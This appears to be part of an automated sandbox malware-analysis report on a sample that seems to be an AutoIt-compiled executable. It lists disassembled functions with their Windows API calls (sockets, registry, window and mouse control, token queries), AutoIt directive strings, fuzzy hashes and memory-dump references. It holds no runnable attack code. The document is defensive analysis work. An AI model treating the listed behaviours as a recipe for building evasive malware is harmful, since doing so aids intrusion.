                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: b90e65a65ec6ba3b1f2a7642aba8ef94473add9b28a5b0ce2dbe2107542d50cf
                                          • Instruction ID: d7404ca376db44476489053ff22b794b86e51b176fdf2dbb785678964a17f8f3
                                          • Opcode Fuzzy Hash: b90e65a65ec6ba3b1f2a7642aba8ef94473add9b28a5b0ce2dbe2107542d50cf
                                          • Instruction Fuzzy Hash: 3B31A472604504AFDF10AF64CC85BBD7BACEF85710F048069FD19E7292DB74AC049B61
                                          Function 0095F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: bc7e61199721def04dccc44c3c6266135b2458eb80959fe68a9355ded81aeeb3
                                          • Instruction ID: fe0ee9ea83c8c99e4bb4f73091bae6df34c2fab28ce820a7fc2467ed32a26f04
                                          • Opcode Fuzzy Hash: bc7e61199721def04dccc44c3c6266135b2458eb80959fe68a9355ded81aeeb3
                                          • Instruction Fuzzy Hash: B22179722052217ACA20E736AC22FA773DCDF99325F104839FD4587091EB549D89C395
                                          Function 0095DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DC09
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DC2F
                                          • SysAllocString.OLEAUT32(00000000), ref: 0095DC32
                                          • SysAllocString.OLEAUT32 ref: 0095DC53
                                          • SysFreeString.OLEAUT32 ref: 0095DC5C
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0095DC76
                                          • SysAllocString.OLEAUT32(?), ref: 0095DC84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 12a341d6c724fcaa050e48dd23f35fad3a03e99223ede754cc2e4ee852b466f0
                                          • Instruction ID: 47824bdec81887e1bea0997317a7c87a4839b09058e47725f74eb341984b17e8
                                          • Opcode Fuzzy Hash: 12a341d6c724fcaa050e48dd23f35fad3a03e99223ede754cc2e4ee852b466f0
                                          • Instruction Fuzzy Hash: CD21C535209204AFDB20DFB9DC88DAB77ECEB08361B108126FD45CB2A1DAB4DC45D764
                                          Function 009875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00987632
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0098763F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0098764A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00987659
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00987665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: d5e45623b5e1727560191bec3a44951c47ba54cfcc33d068e23245778c227c2d
                                          • Instruction ID: 97f0d648847d2cfe0bc3d3254a1513398692bdc8a93a80ed6d95c0a3e44e41f2
                                          • Opcode Fuzzy Hash: d5e45623b5e1727560191bec3a44951c47ba54cfcc33d068e23245778c227c2d
                                          • Instruction Fuzzy Hash: 6111B6B2110219BFEF159F64CC85EEBBF5DEF08798F114115B704A21A0D672DC21DBA4
                                          Function 00929AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __init_pointers.LIBCMT ref: 00929AE6
                                            • Part of subcall function 00923187: EncodePointer.KERNEL32(00000000), ref: 0092318A
                                            • Part of subcall function 00923187: __initp_misc_winsig.LIBCMT ref: 009231A5
                                            • Part of subcall function 00923187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00929EA0
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00929EB4
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00929EC7
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00929EDA
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00929EED
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00929F00
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00929F13
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00929F26
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00929F39
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00929F4C
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00929F5F
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00929F72
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00929F85
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00929F98
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00929FAB
                                            • Part of subcall function 00923187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00929FBE
                                          • __mtinitlocks.LIBCMT ref: 00929AEB
                                          • __mtterm.LIBCMT ref: 00929AF4
                                            • Part of subcall function 00929B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00929AF9,00927CD0,009BA0B8,00000014), ref: 00929C56
                                            • Part of subcall function 00929B5C: _free.LIBCMT ref: 00929C5D
                                            • Part of subcall function 00929B5C: DeleteCriticalSection.KERNEL32(009BEC00,?,?,00929AF9,00927CD0,009BA0B8,00000014), ref: 00929C7F
                                          • __calloc_crt.LIBCMT ref: 00929B19
                                          • __initptd.LIBCMT ref: 00929B3B
                                          • GetCurrentThreadId.KERNEL32 ref: 00929B42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: 776b6cba127be13e38d7342f9124fe9bc209833392656d8b26da83d439f3737e
                                          • Instruction ID: a42bbc0570966a7cea506e71f3baed04e7feba33e6048432c12ecc8d14bd59ff
                                          • Opcode Fuzzy Hash: 776b6cba127be13e38d7342f9124fe9bc209833392656d8b26da83d439f3737e
                                          • Instruction Fuzzy Hash: E4F0B43251D7315AE634B774BC0778A3698EF82734F204A19F464D91DEFF21844155A4
                                          Function 0092406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00923F85), ref: 00924085
                                          • GetProcAddress.KERNEL32(00000000), ref: 0092408C
                                          • EncodePointer.KERNEL32(00000000), ref: 00924097
                                          • DecodePointer.KERNEL32(00923F85), ref: 009240B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: 2fcc3c9e96bbb7bf882637f1efd52e13d6e40499642cbfad37f600bebee6b4da
                                          • Instruction ID: 845247a3887eb1bb4f69eb0da5cdd6aea4b220ba5efcbdffa368048582970f68
                                          • Opcode Fuzzy Hash: 2fcc3c9e96bbb7bf882637f1efd52e13d6e40499642cbfad37f600bebee6b4da
                                          • Instruction Fuzzy Hash: 43E0B6709AD300EFEB10AF62ED1DF453AA8B714786F14D029F111E52A0CBB64644FB14
                                          Function 009664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                          • Instruction ID: 7a8c6014ba826421cffe62bdee8937c1617f38dac76955b85b19417fc7438d03
                                          • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                          • Instruction Fuzzy Hash: 49617A7090065A9FCF01EF64DC82BFE77A9AF85308F058919FC5A6B293DB34A905DB50
                                          Function 009801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009802BD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009802FD
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00980320
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00980349
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0098038C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00980399
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 15c5b4bc07d4cac6e3986a6af37a6ed5d04e7583cd27115bd36f903e67df5304
                                          • Instruction ID: 3abaccddd2c4f86ee9149ac667afb7f32db2231a51a4b0977130957394e1758a
                                          • Opcode Fuzzy Hash: 15c5b4bc07d4cac6e3986a6af37a6ed5d04e7583cd27115bd36f903e67df5304
                                          • Instruction Fuzzy Hash: 80514631208204AFCB14EF64C885E6EBBE9FFC5314F44491DF9958B2A2DB31E949DB52
                                          Function 00985799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32(?), ref: 009857FB
                                          • GetMenuItemCount.USER32(00000000), ref: 00985832
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0098585A
                                          • GetMenuItemID.USER32(?,?), ref: 009858C9
                                          • GetSubMenu.USER32(?,?), ref: 009858D7
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00985928
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: 6c7823e15639e3f86cce5f7f56283c8d746bf701e8ac7c6e47bb5f3ac917062a
                                          • Instruction ID: bd2e1e30de292bfb10cedd2de12fabc910a22b147f27d8b058abe4caf27a2761
                                          • Opcode Fuzzy Hash: 6c7823e15639e3f86cce5f7f56283c8d746bf701e8ac7c6e47bb5f3ac917062a
                                          • Instruction Fuzzy Hash: E2516D75E00615EFCF11EF64C855AAEB7B4EF88320F11846AE811BB351CB35AE45DB90
                                          Function 0095EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0095EF06
                                          • VariantClear.OLEAUT32(00000013), ref: 0095EF78
                                          • VariantClear.OLEAUT32(00000000), ref: 0095EFD3
                                          • _memmove.LIBCMT ref: 0095EFFD
                                          • VariantClear.OLEAUT32(?), ref: 0095F04A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0095F078
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 6962431150ae92f1fa22f2d0aa46077819b19abb8f5e3a30d2c223d44b9c1632
                                          • Instruction ID: 980024fb64dccc8e6afc77b7d93e4b48135e538424340354acca218d9e805d0f
                                          • Opcode Fuzzy Hash: 6962431150ae92f1fa22f2d0aa46077819b19abb8f5e3a30d2c223d44b9c1632
                                          • Instruction Fuzzy Hash: ED517DB5A00209DFCB14CF68C894AAAB7B8FF4C310B15856AED49DB341E335E915CFA0
                                          Function 0096220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00962258
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009622A3
                                          • IsMenu.USER32(00000000), ref: 009622C3
                                          • CreatePopupMenu.USER32 ref: 009622F7
                                          • GetMenuItemCount.USER32(000000FF), ref: 00962355
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00962386
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 3d81dd0eeae71e4b929319f220f27fdb93830dbf33285ce06991b453f161d534
                                          • Instruction ID: fe65c62172b42aa1b390909c847f6b03f98375f5665a59505c4884bec79c94e6
                                          • Opcode Fuzzy Hash: 3d81dd0eeae71e4b929319f220f27fdb93830dbf33285ce06991b453f161d534
                                          • Instruction Fuzzy Hash: 5B51CF70604B4ADBDF21CF68D888FADBBF9BF45714F104529E811A7390E3799944CB51
                                          Function 00901765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0090179A
                                          • GetWindowRect.USER32(?,?), ref: 009017FE
                                          • ScreenToClient.USER32(?,?), ref: 0090181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0090182C
                                          • EndPaint.USER32(?,?), ref: 00901876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: e63d8a99504db12b81e58ff4dcee104fb1618f66634fda881797a46e27e98dce
                                          • Instruction ID: e4e780b91386351005ef9c5d989d6c88ddb585be8a1c75d0a7f342a5f34a7a5e
                                          • Opcode Fuzzy Hash: e63d8a99504db12b81e58ff4dcee104fb1618f66634fda881797a46e27e98dce
                                          • Instruction Fuzzy Hash: 76418C31508700AFD710DF24CC94FAA7BE8EB49724F144629FAA58B2F1D730A945EB62
                                          Function 0098B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(009C57B0,00000000,01026608,?,?,009C57B0,?,0098B5A8,?,?), ref: 0098B712
                                          • EnableWindow.USER32(00000000,00000000), ref: 0098B736
                                          • ShowWindow.USER32(009C57B0,00000000,01026608,?,?,009C57B0,?,0098B5A8,?,?), ref: 0098B796
                                          • ShowWindow.USER32(00000000,00000004,?,0098B5A8,?,?), ref: 0098B7A8
                                          • EnableWindow.USER32(00000000,00000001), ref: 0098B7CC
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0098B7EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: f6f11bc8cd296c841ff2aaf2d0348b7c093a1081479a3bd226bf1372500a0487
                                          • Instruction ID: c62cf5b3c29990b73695bfa514cd99545c9f944e8f5ce11e93638481e17b881d
                                          • Opcode Fuzzy Hash: f6f11bc8cd296c841ff2aaf2d0348b7c093a1081479a3bd226bf1372500a0487
                                          • Instruction Fuzzy Hash: 50417D34604244AFDB22EF24C499B957BE5FF89310F5C41B9E9488FBA2C731A856CB50
                                          Function 0097709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00974E41,?,?,00000000,00000001), ref: 009770AC
                                            • Part of subcall function 009739A0: GetWindowRect.USER32(?,?), ref: 009739B3
                                          • GetDesktopWindow.USER32 ref: 009770D6
                                          • GetWindowRect.USER32(00000000), ref: 009770DD
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0097710F
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          • GetCursorPos.USER32(?), ref: 0097713B
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00977199
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 0f4345d3b564fb10958bad4f705949323efb598fe4bda2017d2b8d7721935d2e
                                          • Instruction ID: 913a4c16156ce33e5a87fb23e98d9f055d7ef21e6f86d630573e1a0f01663ccc
                                          • Opcode Fuzzy Hash: 0f4345d3b564fb10958bad4f705949323efb598fe4bda2017d2b8d7721935d2e
                                          • Instruction Fuzzy Hash: CF31D072609305ABD720DF54D849B9BB7AAFF88314F004929F58997291CB30EA09CB92
                                          Function 00958879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009580C0
                                            • Part of subcall function 009580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009580CA
                                            • Part of subcall function 009580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009580D9
                                            • Part of subcall function 009580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009580E0
                                            • Part of subcall function 009580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009580F6
